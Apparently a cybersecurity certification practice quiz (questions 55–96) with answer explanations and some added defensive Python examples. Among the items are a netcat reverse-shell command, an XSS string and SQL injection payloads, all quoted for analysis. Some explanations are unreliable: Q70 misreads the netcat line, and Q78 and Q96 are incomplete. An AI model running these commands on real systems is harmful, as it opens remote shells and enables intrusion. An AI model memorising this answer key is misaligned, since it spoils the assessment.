55. Company A permits visiting business partners from Company B to utilize Ethernet ports available in Company A's conference rooms. This access is provided to allow partners the ability to establish VPNs back to Company B's network. The security architect for Company A wants to ensure partners from Company B are able to gain direct Internet access from available ports only, while Company A employees can gain access to the Company A internal network from those same ports. Which of the following can be employed to allow this?

Explanation

NAC (Network Access Control) can be employed to allow partners from Company B to gain direct internet access from available ports only, while Company A employees can gain access to the company A internal network from those same ports. NAC allows for the enforcement of access policies based on user identity, device type, and other factors, ensuring that only authorized users and devices can access specific resources. By implementing NAC, the security architect can control and differentiate the access privileges for partners and employees, meeting the requirements of the situation described.

56. When preparing for a third-party audit, the vice president of risk management and the vice president of information technology have stipulated that the vendor may not use offensive software during the audit. This is an example of:

Explanation

The given scenario describes a situation where the vice president of risk management and the vice president of information technology have set a condition that the vendor should not use offensive software during the audit. This condition is an example of "rules of engagement" as it outlines the specific guidelines and expectations for the vendor's behavior during the audit process. Rules of engagement are commonly used in business relationships to establish boundaries and ensure that all parties involved are aware of the expected conduct.

57. An analyst has received unusual alerts on the SIEM dashboard. The analyst wants to get payloads that the hackers are sending toward the target systems without impacting the business operation. Which of the following should the analyst implement?

Explanation

A honeypot is a decoy system that is designed to attract hackers and gather information about their activities. By implementing a honeypot, the analyst can create a realistic target system that appears vulnerable to hackers. This allows the analyst to monitor the payloads that the hackers are sending without impacting the actual business operation. The honeypot acts as a trap, luring the hackers away from the real target systems while providing valuable insight into their tactics and techniques.

58. A cybersecurity professional typed in a URL and discovered the admin panel for the e-commerce application over the open web with the default password. Which of the following is the MOST secure solution to remediate this vulnerability?

Explanation

The most secure solution to remediate this vulnerability is to change the user name and default password, whitelist specific source IP addresses, and require two-factor authentication. By changing the user name and default password, it ensures that the admin panel is not accessible with the default credentials. Whitelisting specific source IP addresses adds an extra layer of security by only allowing access from trusted sources. Requiring two-factor authentication adds another level of protection by requiring an additional verification step, making it harder for unauthorized users to gain access.

59. A security analyst has created an image of a drive from an incident. Which of the following describes what the analyst should do NEXT?

Explanation

The analyst should create a hash of the image and compare it to the original drive's hash to ensure the integrity and authenticity of the image. This process helps in verifying that the image has not been tampered with and is an accurate representation of the original drive. By comparing the hashes, the analyst can determine if any changes have been made to the image, which could potentially impact the analysis and findings.

60. A cybersecurity analyst is completing an organization's vulnerability report and wants it to reflect assets accurately. Which of the following items should be in the report?

Explanation

The correct answer is virtual hosts. In a vulnerability report, it is important to include information about the organization's virtual hosts. Virtual hosts are used to host multiple websites or applications on a single physical server, and they can introduce vulnerabilities if not properly secured. Including virtual hosts in the report will help the analyst identify any potential vulnerabilities or weaknesses in the organization's virtual hosting environment.

61. A cybersecurity analyst was hired to resolve a security issue within a company after it was reported that many employee account passwords had been compromised. Upon investigating the incident, the cybersecurity analyst found that a brute force attack had been launched against the company. Which of the following remediation actions can the cybersecurity analyst recommend to senior management to address these security issues?

Explanation

The cybersecurity analyst can recommend deploying multifactor authentication as a remediation action to address the security issues. This is because multifactor authentication adds an extra layer of security by requiring users to provide multiple forms of identification, such as a password and a unique code sent to their mobile device, before accessing their accounts. This would help prevent unauthorized access even if the passwords are compromised through a brute force attack.

62. Following a security breach, a post-mortem was done to analyze the driving factors behind the breach. The cybersecurity analysis discussed potential impacts, mitigations, and remediation based on current events and emerging threat vectors to specific stakeholders. Which of the following is this considered to be?

Explanation

The given scenario describes a post-mortem analysis conducted after a security breach. The analysis involves discussing potential impacts, mitigations, and remediation based on current events and emerging threat vectors. This process is known as threat intelligence, which refers to the collection, analysis, and dissemination of information about potential threats to an organization's security. It helps organizations understand the nature of the threats they face and make informed decisions to protect their systems and data.

63. A security analyst has noticed an alert from the SIEM. A workstation is repeatedly trying to connect to port 445 of a file server on the production network. All of the attempts are made with invalid credentials. Which of the following describes what is occurring?

Explanation

The repeated attempts to connect to port 445 with invalid credentials suggest that an attacker has gained control of the workstation and is attempting to pivot to the file server by creating an SMB session. This behavior indicates unauthorized and malicious activity, where the attacker is using the compromised workstation as a stepping stone to gain access to the file server.

64. A security administrator recently deployed and verified the installation of a critical patch issued by the company's primary OS vendor. This patch was supposed to remedy a vulnerability that would allow an adversary to remotely execute code from the network. However, the administrator just ran a vulnerability assessment of networked systems, and each of them still reported having the same vulnerability. Which of the following is the MOST likely explanation for this?

Explanation

The most likely explanation for the networked systems still reporting the same vulnerability after the patch was applied is that the patch did not successfully fix the vulnerability. This means that the patch either did not address the specific vulnerability or was not properly installed on the systems. It is important for the administrator to investigate further and ensure that the patch is applied correctly or seek alternative solutions to fix the vulnerability.

65. A security analyst received a compromised workstation. The workstation's hard drive may contain evidence of criminal activities. Which of the following is the FIRST thing the analyst must do to ensure the integrity of the hard drive while performing the analysis?

Explanation

To ensure the integrity of the hard drive while performing the analysis, the security analyst must use write blockers. Write blockers are hardware or software tools that prevent any write operations on the hard drive, ensuring that no changes or modifications are made to the original evidence. By using write blockers, the analyst can securely examine the contents of the compromised workstation's hard drive without the risk of inadvertently altering or contaminating the evidence.

66. An alert has been distributed throughout the information security community regarding a critical Apache vulnerability. Which of the following courses of action would ONLY identify the known vulnerability?

Explanation

Performing a scan for the specific vulnerability on all web servers would ONLY identify the known vulnerability because it focuses specifically on scanning for that particular vulnerability on the web servers. The other options involve different types of scans (unauthenticated vulnerability scan, web vulnerability scan, authenticated scan) which may identify other vulnerabilities as well, but they do not guarantee that they will specifically identify the known vulnerability mentioned in the alert.

67. Law enforcement has contacted a corporation's legal counsel because correlated data from a breach shows the organization as the common denominator among all indicators of compromise. An employee overhears the conversation between legal counsel and law enforcement, and then posts a comment about it on social media. The media then starts contacting other employees about the breach. Which of the following steps should be taken to prevent further disclosure of information about the breach?

Explanation

To prevent further disclosure of information about the breach, it is important to increase security awareness about incident communications channels. This means educating employees about the proper channels and protocols for discussing and sharing information related to security incidents. By doing so, employees will be more likely to understand the importance of keeping such information confidential and will be less likely to share it on social media or with the media. This step helps to ensure that employees are aware of the appropriate ways to handle sensitive information and reduces the risk of further disclosure.

68. A company wants to update its acceptable use policy (AUP) to ensure it relates to the newly implemented password standard, which requires sponsored authentication of guest wireless devices. Which of the following is MOST likely in the AUP?

Explanation

The most likely inclusion in the acceptable use policy (AUP) would be that guests using the wireless network should provide valid identification when registering their wireless devices. This requirement aligns with the newly implemented password standard and ensures that only authorized individuals are able to access the network. It also helps to maintain security and accountability for any actions taken on the network.

69. A security professional is analyzing the results of a network utilization report. The report includes the following:

IP address     Server Name          Server Uptime     Historical   Current
172.20.2.58    web.srvr.03          30D 12H 52M 09S   41.3GB       37.2GB
172.20.2.125   dev.web.srvr.01      30D 12H 52M 09S   1.81GB       2.2GB
172.20.2.22    hr.dbprod.01         30D 12H 17M 22S   2.24GB       29.97GB
172.20.2.26    mrktg.file.srvr.02   30D 12H 41M 09S   1.23GB       0.34GB
172.20.2.28    accnt.file.srvr.01   30D 12H 52M 09S   3.62GB       3.57GB
172.20.2.30    R&D.file.srvr.01     1D 4H 22M 01S     1.24GB       0.764GB

Which of the following servers needs further investigation?

Explanation

The server "hr.dbprod.01" needs further investigation because its current utilization is far out of line with its historical utilization. The historical utilization is 2.24GB, while the current utilization is 29.97GB, a significant increase in usage. This discrepancy suggests that there may be a potential issue or anomaly with the server's performance or data usage, warranting further investigation by the security professional.

70. A cybersecurity analyst is retained by a firm for an open investigation. Upon arrival, the cybersecurity analyst reviews several security logs. Given the following snippet of code:

sc config schedule start auto
net start schedule
at 13:30 "C:\nc.exe 192.168.0.101 777 -e cmd.exe"

Which of the following combinations BEST describes the situation and the recommendations to be made for this situation?

Explanation

The given correct answer suggests that the cybersecurity analyst has found evidence of host 192.168.0.101 using Windows Task Scheduler to run the nc.exe file at 13:30. This indicates suspicious activity, as the nc.exe file is often associated with network scanning or malicious activity. The recommendation is to proceed with the next step of removing the host from the network, as it poses a potential security threat.

71. A security analyst is reviewing the following log after enabling key-based authentication:

Dec 21 11:00:57 CompTIA sshd(5657): Failed password for root from 95.58.255.62 port 38980 ssh2
Dec 21 20:08:26 CompTIA sshd(5768): Failed password for root from 91.205.189.15 port 38156 ssh2
Dec 21 20:08:30 CompTIA sshd(5770): Failed password for nobody from 91.205.189.15 port ssh2
Dec 21 20:08:34 CompTIA sshd(5772): Failed password for invalid user asterisk from 91.205.189.15 port 38864 ssh2
Dec 21 20:08:38 CompTIA sshd(5774): Failed password for invalid user sjobeck from 91.205.189.15 port 39647 ssh2
Dec 21 20:08:42 CompTIA sshd(5776): Failed password for root from 91.205.189.15 port 39467 ssh2

Given the above information, which of the following steps should be performed NEXT to secure the system?

Explanation

Based on the log, it can be observed that there are multiple failed password attempts for the root user and invalid user accounts. This indicates that the system is vulnerable to brute-force attacks. To secure the system, the next step should be to disable password authentication for SSH. This will prevent attackers from guessing passwords and gaining unauthorized access to the system. Instead, key-based authentication should be used, which is more secure and less prone to brute-force attacks.
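An added example, not part of the original quiz, that works through both halves of the explanation above: it parses sshd "Failed password" lines of the form shown in the question (including the one with no port number), summarises the attempts per source address, and then checks an sshd_config fragment for the recommended setting, PasswordAuthentication no, with the weak and hardened fragments side by side. The log lines and config fragments are constructed samples, and the attempt threshold is an assumption.

```python
"""Triage sshd password failures and verify the remediation.

Added example (not from the quiz). min_attempts and the two sshd_config
fragments are assumptions used for illustration.
"""
import re
from collections import defaultdict

# Constructed sample, copied in form from the question's log excerpt. The third
# line has no port number, exactly as the page shows it.
AUTH_LOG = """\
Dec 21 11:00:57 CompTIA sshd(5657): Failed password for root from 95.58.255.62 port 38980 ssh2
Dec 21 20:08:26 CompTIA sshd(5768): Failed password for root from 91.205.189.15 port 38156 ssh2
Dec 21 20:08:30 CompTIA sshd(5770): Failed password for nobody from 91.205.189.15 port ssh2
Dec 21 20:08:34 CompTIA sshd(5772): Failed password for invalid user asterisk from 91.205.189.15 port 38864 ssh2
Dec 21 20:08:38 CompTIA sshd(5774): Failed password for invalid user sjobeck from 91.205.189.15 port 39647 ssh2
Dec 21 20:08:42 CompTIA sshd(5776): Failed password for root from 91.205.189.15 port 39467 ssh2
"""

# Constructed sshd_config fragments: the weak setting and the corrected one.
WEAK_CONFIG = "PasswordAuthentication yes\nPubkeyAuthentication yes\n"
HARDENED_CONFIG = (
    "PubkeyAuthentication yes\n"
    "PasswordAuthentication no\n"
    "# PasswordAuthentication yes   <- commented out, so ignored\n"
)

# Accepts both the page's "sshd(5657):" and the usual "sshd[5657]:" spelling;
# the port number is optional because one log line on the page lacks it.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d{2}:\d{2}:\d{2})\s+\S+\s+sshd[\(\[]\d+[\)\]]:\s+"
    r"Failed password for (?P<invalid>invalid user )?(?P<user>\S+)"
    r" from (?P<ip>\d+\.\d+\.\d+\.\d+) port\s*(?P<port>\d+)?"
)


def parse_failures(text):
    """Return one dict per 'Failed password' line; other lines are ignored."""
    out = []
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            d = m.groupdict()
            d["invalid"] = d["invalid"] is not None  # account does not exist
            d["port"] = int(d["port"]) if d["port"] else None
            out.append(d)
    return out


def summarize_by_source(failures):
    """Per source IP: attempt count, distinct usernames, root and invalid-user attempts."""
    summary = defaultdict(lambda: {"attempts": 0, "users": set(), "root": 0, "invalid": 0})
    for f in failures:
        s = summary[f["ip"]]
        s["attempts"] += 1
        s["users"].add(f["user"])
        s["root"] += int(f["user"] == "root")
        s["invalid"] += int(f["invalid"])
    return dict(summary)


def brute_force_sources(summary, min_attempts=3):
    """Sources with at least min_attempts failures. Cycling through several
    usernames, some of which do not exist, is the password-guessing pattern."""
    return sorted(ip for ip, s in summary.items() if s["attempts"] >= min_attempts)


def effective_sshd_settings(config_text):
    """Effective values of the two keywords that matter here. OpenSSH honours the
    first occurrence of a keyword and ignores later duplicates and comments.
    Match blocks are not handled (assumption: a flat config)."""
    settings = {"passwordauthentication": "yes", "pubkeyauthentication": "yes"}  # defaults
    seen = set()
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        key = key.lower()
        if key in settings and key not in seen:
            settings[key] = value.strip().lower()
            seen.add(key)
    return settings


def password_auth_disabled(config_text):
    """True when password logins are off and key-based logins remain enabled."""
    s = effective_sshd_settings(config_text)
    return s["passwordauthentication"] == "no" and s["pubkeyauthentication"] == "yes"


if __name__ == "__main__":
    summary = summarize_by_source(parse_failures(AUTH_LOG))
    for ip in brute_force_sources(summary):
        s = summary[ip]
        print(f"{ip}: {s['attempts']} failures, users tried {sorted(s['users'])}")
    print("weak config blocks passwords:", password_auth_disabled(WEAK_CONFIG))
    print("hardened config blocks passwords:", password_auth_disabled(HARDENED_CONFIG))
```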

72. An organization is attempting to harden its web server and reduce the information that might be disclosed to potential attackers. A security analyst is reviewing vulnerability scan results from a recent web server scan. Portions of the scan results are shown below:

Finding #5144322
First Time Detected: 10 Nov 2015 09:00 GMT-0600
Last Time Detected: 10 Nov 2015 09:00 GMT-0600
CVSS Base: 5
Access Path: http:/myOrg.com/mailingList.htm
Request: GET https://myOrg.com/mailingList.aspx?content=volunteer
Response: C:\Documents\MarySmith\mailingList.pdf

Which of the following lines indicates information disclosure about the host that needs to be remediated?

Explanation

The line "Response: C:\Documents\MarySmith\mailingList.pdf" indicates information disclosure about the host that needs to be remediated. This line shows the file path and name of a PDF document that is being disclosed in the server's response. This information could potentially be valuable to attackers as it reveals the location and name of a file on the server, which could be used for further exploitation or unauthorized access. Hardening the web server should involve removing or securing any sensitive information that is being disclosed in the server's responses.

73. Which of the following tools should a cybersecurity analyst use to verify the integrity of a forensic image before and after an investigation?

Explanation

A cybersecurity analyst should use sha1sum to verify the integrity of a forensic image before and after an investigation. sha1sum is a tool that calculates and verifies the checksum of a file. By comparing the checksums before and after the investigation, the analyst can ensure that the forensic image has not been tampered with or altered. This is crucial for maintaining the integrity and reliability of the evidence collected during the investigation.

74. A cybersecurity analyst has run a vulnerability scan and found inconsistent results from the organization's database servers. The results often appear incomplete compared to other servers in the domain. Which of the following provides the BEST way to arrive at a complete scan of the database servers?

Explanation

A credentialed scan is the best way to arrive at a complete scan of the database server because it allows the scanner to authenticate and gain access to the server using valid credentials. This ensures that the scanner has the necessary privileges to fully scan the server and retrieve all the relevant information. Without proper credentials, the scanner may be limited in its ability to access certain areas of the server, resulting in incomplete results.

Submit
75. External users are reporting that a web application is slow and frequently times out when attempting to submit information. Which of the following software development best practices would have helped avoid the issue?

Explanation

Stress testing would have identified the performance problem before release. By subjecting the application to high numbers of concurrent users, heavy request loads or extreme data volumes, stress testing measures the application's stability, responsiveness and reliability under those conditions. The bottlenecks, resource limits or blocking operations that now cause the application to slow down and time out would have surfaced in the test environment, where they could have been fixed before external users were affected.
76. The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious e-mail that has been reported by multiple users. The analyst has determined the e-mail includes an attachment named invoice.zip that contains the following files: Locky.js, xerty.ini, xerty.lib. Further analysis indicated that when the .zip is opened, it installs a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices?

Explanation

The first step is to e-mail employees instructing them not to open the invoice attachment. Several users have already reported the message, so the campaign is active and every additional user who opens the .zip is another device that will start encrypting whatever file shares it can reach. Warning employees immediately stops new infections at their source. Disabling access to the company VPN, setting permissions on the NAS file shares to read-only, and adding the URL found in the .js file to the company's web proxy filter are additional containment steps, but according to the quiz they follow the warning to employees.
77. A new policy requires the security team to perform web application and OS vulnerability scans. All of the company's web applications use federated authentication and are accessible via a central portal. Which of the following should be implemented to ensure a more accurate scan of the company's web applications, while at the same time reducing false positives?

Explanation

The vulnerability scanner should be configured to perform authenticated scans. Because every application sits behind federated authentication on a central portal, an unauthenticated scanner only ever sees the login page and has to guess at what lies behind it, which produces both missed findings and false positives. Logging the scanner in with valid credentials lets it crawl the authenticated parts of each application and exercise the functionality real users have, giving a more complete and more accurate assessment.
78. During a review of security controls, an analyst was able to connect to an external, unsecured FTP server from a workstation. The analyst was troubleshooting and reviewed the ACLs of the segment firewall the workstation is connected to. Based on the ACLs above, which of the following explains why the analyst was able to connect to the FTP server?

Explanation

The analyst was able to connect to the FTP server because FTP was explicitly allowed in sequence 8 of the ACL. Firewall ACLs are evaluated in order and the first matching entry wins, so an explicit permit for FTP that precedes any later deny allows outbound FTP regardless of what follows it.
79. In order to meet regulatory compliance objectives for the storage of PHI, vulnerability scans must be conducted on a continuous basis. The last completed scan of the network returned 5,682 possible vulnerabilities. The Chief Information Officer (CIO) would like to establish a remediation plan to resolve all known issues. Which of the following is the BEST way to proceed?

Explanation

The best way to proceed is to reduce the scan to items that are classified as critical in the asset inventory and resolve those issues first. With thousands of findings, remediation has to be prioritized by risk, and the assets that store or process PHI are the ones whose compromise would breach the compliance objective. Focusing on the critical assets concentrates limited resources on the vulnerabilities that matter most, while the remaining findings are worked through in later cycles.
80. A threat intelligence analyst who works for a technology firm received this report from a vendor:

"There has been an intellectual property theft executed against organizations in the technology industry. Indicators for this activity are unique to each intrusion. The information that appears to be targeted is R&D data. The data exfiltration appears to occur over months via uniform TTPs. Please execute a defensive operation regarding this attack vector."

Which of the following combinations suggests how the threat should MOST likely be classified and the type of analysis that would be MOST helpful in protecting against this activity?

Explanation

The report describes targeted theft of R&D data from a specific industry, exfiltration carried out over months, and indicators that differ from one intrusion to the next while the TTPs stay the same. That combination is the profile of an Advanced Persistent Threat (APT), and the most helpful analysis is behavioral analysis. Because the atomic indicators (hashes, IP addresses, domains) change per victim, matching on them will not catch the next intrusion; the tactics, techniques and procedures are what remain constant, so detection built around the attacker's behavior is what transfers across intrusions.
81. An incident report indicated a virus was introduced through a remote host that was connected to corporate resources. A cybersecurity analyst has been asked for a recommendation to solve this issue. Which of the following should be applied?

Explanation

NAC (Network Access Control) should be applied. The incident shows that a remote host was allowed to reach corporate resources without any check of its security state. NAC enforces policy at the point of connection: it authenticates the device and user and can assess posture (patch level, antivirus status, configuration) before granting access, quarantining hosts that fail. That prevents an unmanaged or infected remote host from connecting to the corporate network in the first place.
82. A malicious user is receiving the following output:

root:~# ping 192.168.1.137
64 bytes from 192.168.2.1: icmp_seq=1 ttl=63 time=1.58 ms
64 bytes from 192.168.2.1: icmp_seq=2 ttl=63 time=1.58 ms

Based on the above output, which of the following is the device between the malicious user and the target?

Explanation

The device between the malicious user and the target is a proxy. The echo requests were sent to 192.168.1.137, but the replies come from 192.168.2.1. A router would forward the request and pass back the target's own reply, so the source address would be 192.168.1.137; here the intermediate device answers on the target's behalf, which is proxy behavior. The TTL of 63 (one below the common default of 64) is consistent with the reply originating one hop away at that device.
83. A cybersecurity analyst has several SIEM event logs to review for possible APT activity. The analyst was given several items that include lists of indicators for both IP addresses and domains. Which of the following actions is the BEST approach for the analyst to perform?

Explanation

The best approach is to analyze the trends of the events while manually reviewing them to see if any of the indicators match. APT activity is low and slow, so the analyst is looking both for direct hits on the supplied IP and domain indicators and for patterns over time (periodic beacons, unusual destinations, off-hours activity) that a single match would not reveal. Reviewing the events with the indicator lists at hand combines both views and gives the best chance of spotting the intrusion.
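Whichever way the review is organized, the indicator matching itself should be exact for IP addresses and label-aware for domains, so that mail.update-check.example matches the indicator update-check.example but safe-update-check.example does not. The script below is an added example of that matching (it is not quiz content or any SIEM's code); the indicator lists and the key=value event lines are constructed for the demonstration.

```python
"""Match IP and domain indicators against SIEM-style event lines (added example)."""
import ipaddress
import re

# Constructed indicator lists (not real threat intelligence).
IOC_IPS = {"203.0.113.45", "198.51.100.7"}
IOC_DOMAINS = {"update-check.example", "cdn.bad-example.net"}

# Constructed sample events in a simplified key=value export.
SAMPLE_EVENTS = [
    "ts=2024-03-01T10:00:01Z src=10.0.0.5 dst=203.0.113.45 dport=443 host=www.example.com",
    "ts=2024-03-01T10:00:07Z src=10.0.0.9 dst=93.184.216.34 dport=80 host=mail.update-check.example",
    "ts=2024-03-01T10:00:09Z src=10.0.0.5 dst=93.184.216.34 dport=80 host=safe-update-check.example",
    "ts=2024-03-01T10:01:13Z src=10.0.0.12 dst=198.51.100.7 dport=8443 host=cdn.bad-example.net",
]

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\bhost=([A-Za-z0-9.-]+)")


def domain_matches(host, ioc_domains):
    """True if host equals an indicator or is a subdomain of one (label-aligned).

    Using endswith on "." + indicator avoids the classic false positive where
    "safe-update-check.example" would match "update-check.example".
    """
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in ioc_domains)


def match_event(line, ioc_ips=IOC_IPS, ioc_domains=IOC_DOMAINS):
    """Return the list of (kind, indicator) hits found in one event line."""
    hits = []
    for ip in IP_RE.findall(line):
        try:
            ipaddress.ip_address(ip)  # discard things like 999.1.1.1
        except ValueError:
            continue
        if ip in ioc_ips:
            hits.append(("ip", ip))
    m = HOST_RE.search(line)
    if m and domain_matches(m.group(1), ioc_domains):
        hits.append(("domain", m.group(1).lower()))
    return hits


def scan(events=SAMPLE_EVENTS):
    """Return [(event_index, hits)] for every event with at least one hit."""
    results = []
    for i, line in enumerate(events):
        hits = match_event(line)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in scan():
        print(idx, hits)
```

On a real SIEM the same logic runs as a saved query or lookup table; the value of writing it out is seeing that the domain comparison has to be anchored on a label boundary, not a plain substring.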
84. A security analyst is to configure a vulnerability scan for a new segment on the network. Given the requirement to prevent credentials from traversing the network while still conducting a credentialed scan, which of the following is the BEST choice?

Explanation

Installing agents on the endpoints to perform the scan is the best choice. An agent runs locally with the privileges it needs and reports results back to the scanner, so the assessment is still credentialed but no account credentials are ever sent across the segment where they could be captured or replayed. A network-based credentialed scan, by contrast, has to authenticate to each host over the wire.
85. An application development company released a new version of its software to the public. A few days after the release, the company is notified by end users that the application is notably slower, and older security bugs have reappeared in the new release. The development team has decided to include the security analyst during their next development cycle to help address the reported issues. Which of the following should the analyst focus on to remedy the existing reported problems?

Explanation

The analyst should perform security regression testing during each development cycle. Previously fixed security bugs reappearing is the definition of a regression: a change elsewhere reintroduced the defect, and nothing in the release process caught it. Regression tests that re-run the test cases for every past security fix, automated as part of each build, detect that reintroduction before the software ships.
86. A security analyst at a small regional bank has received an alert that nation states are targeting financial institutions via phishing campaigns. Which of the following techniques would the analyst recommend as a proactive measure to defend against this type of threat?

Explanation

Location-based Network Access Control (NAC) is the recommended proactive measure. A regional bank has a well-defined geographic footprint, so restricting network access to users and devices connecting from expected locations removes a large part of the attack surface that a foreign nation state would use after a successful phish: even if credentials are captured, they cannot be used from outside the permitted region. This does not stop the phishing e-mails themselves, but it limits what a compromised credential is worth.
87. A security analyst has been notified by the IDS that website XYZ is under attack. Analysis of the web logs shows the following string:

INSERT INTO message <Script>source=https://comptiasite.com</script>

Which of the following attacks is occurring?

Explanation

The string is an example of a cross-site scripting (XSS) attack. The attacker is submitting a script tag that references an external site as the content of a message; the INSERT INTO shows it being written into the application's message store, so every visitor whose browser later renders that message will execute the injected script, a stored XSS. The injected code can steal session cookies, redirect users or perform actions in their name. The fix is to encode user-supplied text on output so that markup is displayed rather than interpreted.
88. The Chief Information Officer (CIO) of a company has been receiving an increased amount of spam in the last month. The CIO has not signed up for any newsletter or given contact information to any vendors during this time frame. Which of the following techniques would a cybersecurity analyst employ to duplicate an external actor's methods of uncovering the CIO's e-mail address? (Select two.)

Explanation

The correct answers are social media profiling and e-mail harvesting. Social media profiling gathers information about an individual from public profiles (employer, role, naming conventions, contact details), which can reveal or make it trivial to guess a corporate address. E-mail harvesting collects addresses from websites, press releases, online directories and public document metadata. Reproducing both techniques shows the analyst exactly what an external actor could find without the CIO ever handing out the address.
89. A cybersecurity analyst has received an alert that well-known "call home" messages are continuously observed by network sensors at the network boundary. The proxy firewall successfully drops the messages. After determining the alert was a true positive, which of the following represents the MOST likely cause?

Explanation

The correct answer is "Commands are attempting to reach a system infected with a botnet trojan." Continuous call-home (beaconing) traffic at the boundary means a system inside the network is infected and trying to establish its command-and-control channel. The proxy firewall dropping the messages blocks that channel, but it does not remove the infection; the host will keep beaconing until it is identified and cleaned, so the alert should be used to locate the infected system rather than treated as resolved.
90. A security administrator for a bank branch office performed a routine vulnerability assessment. The assessment yielded a critical vulnerability that provides administrative access to affected systems without passwords. Because every system was affected by the vulnerability, the administrator must now prioritize which system should be remediated first. Judging the role of the systems by their host names, which of the following should the administrator prioritize first?

Explanation

The administrator should remediate SERVER-DC01.bank.local first because its name identifies it as a domain controller. Domain controllers authenticate every user and hold the directory that governs access to all other domain resources; an attacker with password-less administrative access to one can create accounts, extract credentials and compromise the whole domain. Fixing it first contains the blast radius while the remaining hosts are patched.
91. After completing a vulnerability scan, the following output was noted:

CVE-2011-3389
QID 42366 - SSLv3.0 / TLSv1.0 protocol weak CBC mode server side vulnerability
Check with:
openssl s_client -connect qualys.jlive.mobile.com:443 -tls1 -cipher AES:CAMELLIA:SEED:3DES:DES

Which of the following vulnerabilities has been identified?

Explanation

The correct answer is "Web application cryptography vulnerability". The finding is CVE-2011-3389, the BEAST weakness in CBC-mode cipher suites under SSL 3.0 and TLS 1.0, on the HTTPS service (port 443) of the web server. The openssl s_client command in the output reproduces the check by forcing TLS 1.0 and offering only CBC ciphers; if the handshake succeeds, the server still accepts the weak configuration. Remediation is to disable SSL 3.0 and TLS 1.0 and prefer TLS 1.2 or later with AEAD cipher suites.
92. Following a data compromise, a cybersecurity analyst noticed the following executed query:

SELECT * FROM Users WHERE name = rick or 1=1

Which of the following attacks occurred, and which of the following technical security controls would BEST reduce the risk of future impact from this attack?

Explanation

The executed query indicates a SQL injection attack. The application concatenated user input into the SQL text, and the attacker supplied "rick or 1=1" so that the WHERE clause became always true and every row of the Users table was returned. Parameter validation is the best technical control: validating each input against what it is allowed to contain (for a user name, a short alphanumeric string) rejects the injected SQL before it reaches the database, and combined with parameterised queries, which bind values instead of splicing them into the statement, it removes the injection path entirely.
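The vulnerable and corrected versions of the query in question 92, as an added example using an in-memory SQLite database (this is illustration code, not the compromised application). The quiz shows the query without quotes around the name; the example uses the quoted form that typical application code produces, so the payload becomes rick' OR '1'='1. Table contents are constructed.

```python
"""SQL injection via string concatenation vs. a parameterised query (added example)."""
import re
import sqlite3


def setup_db():
    """Constructed in-memory Users table standing in for the compromised database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    con.executemany(
        "INSERT INTO Users (name, role) VALUES (?, ?)",
        [("rick", "user"), ("morty", "user"), ("admin", "admin")],
    )
    return con


def lookup_unsafe(con, name):
    """Vulnerable: the user's input becomes part of the SQL text.

    Input "rick' OR '1'='1" turns the WHERE clause into
    name = 'rick' OR '1'='1', which is true for every row.
    """
    sql = "SELECT name FROM Users WHERE name = '" + name + "' ORDER BY id"
    return [row[0] for row in con.execute(sql)]


def lookup_safe(con, name):
    """Parameterised: the driver binds the value, so it cannot alter the query shape."""
    rows = con.execute(
        "SELECT name FROM Users WHERE name = ? ORDER BY id", (name,)
    )
    return [row[0] for row in rows]


def validate_username(name):
    """Parameter validation as the second layer: allow-list what a user name may contain."""
    if not re.fullmatch(r"[A-Za-z0-9._-]{1,32}", name):
        raise ValueError("invalid username")
    return name


if __name__ == "__main__":
    payload = "rick' OR '1'='1"
    db = setup_db()
    print("unsafe:", lookup_unsafe(db, payload))   # every user
    print("safe:  ", lookup_safe(db, payload))     # no such user
```

The parameterised query is the primary fix; the allow-list validation is the control the quiz names and is still worth having, because it also stops the payload reaching any code path that was overlooked.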
93. A cybersecurity analyst is currently investigating a server outage. The analyst has discovered the following value was entered for the user name: 0xbfff601a. Which of the following attacks may be occurring?

Explanation

The value 0xbfff601a is a 32-bit memory address in the range that Linux on x86 uses for the process stack, and a raw address is not something a legitimate user types into a name field. Supplying an address as input is characteristic of a format string attack: when the application passes the input to a printf-style function as the format argument, the attacker combines an embedded address with conversion specifiers such as %x and %n to read or write that location in memory. A failed or partial attempt corrupts the process and crashes it, which fits the outage being investigated.
94. A company is running Microsoft Office on a file server. A vulnerability scan returned the following result:

Vulnerable software installed: Office 2007
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\000021095F01000000100000000F01FEC\InstallProperties - key exists
The Office component Microsoft Office Excel Services is running an affected version - 12.0.6612.1000
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\000021095F01000000100000000F01FE\Patches\F6A389258DE016A46B54137BE2278095A - key does not exist
Patch {52983A6F-0ED8-4A61-B645-31B72E7208A9} is not installed

Which of the following would provide the MOST efficient method of remediating this finding?

Explanation

The scan identified an affected version of Microsoft Office Excel Services on the file server and, in the registry, the absence of the Patches subkey for a specific patch GUID, which is how the scanner established that the fix is missing. The most efficient remediation is to install the missing patch on the server. Applying the vendor patch directly addresses the finding, and the scanner's next run will confirm it by finding the patch key present.
95. A security analyst is reviewing logs and discovers that a company-owned computer issued to an employee is generating many alerts and warnings. The analyst continues to review the log events and discovers that a non-company-owned device from a different, unknown IP address is generating the same events. The analyst informs the manager of these findings, and the manager explains that these activities are already known and part of an ongoing simulation. Given this scenario, which of the following roles are the analyst, the employee and the manager filling?

Explanation

The analyst is the blue team: monitoring the logs and defending the company's systems, without prior knowledge of the exercise. The employee, whose company-issued computer and a second non-company device are producing the attack-like events, is acting as the red team, simulating the adversary. The manager, who knows the activity is a planned simulation and is coordinating it, is the white team, which plans, oversees and referees the exercise.
96. The software development team pushed a new web application into production for the accounting department. Shortly after the application was published, the head of the accounting department informed IT operations that the application was not performing as intended. Which of the following SDLC best practices was missed?

Explanation

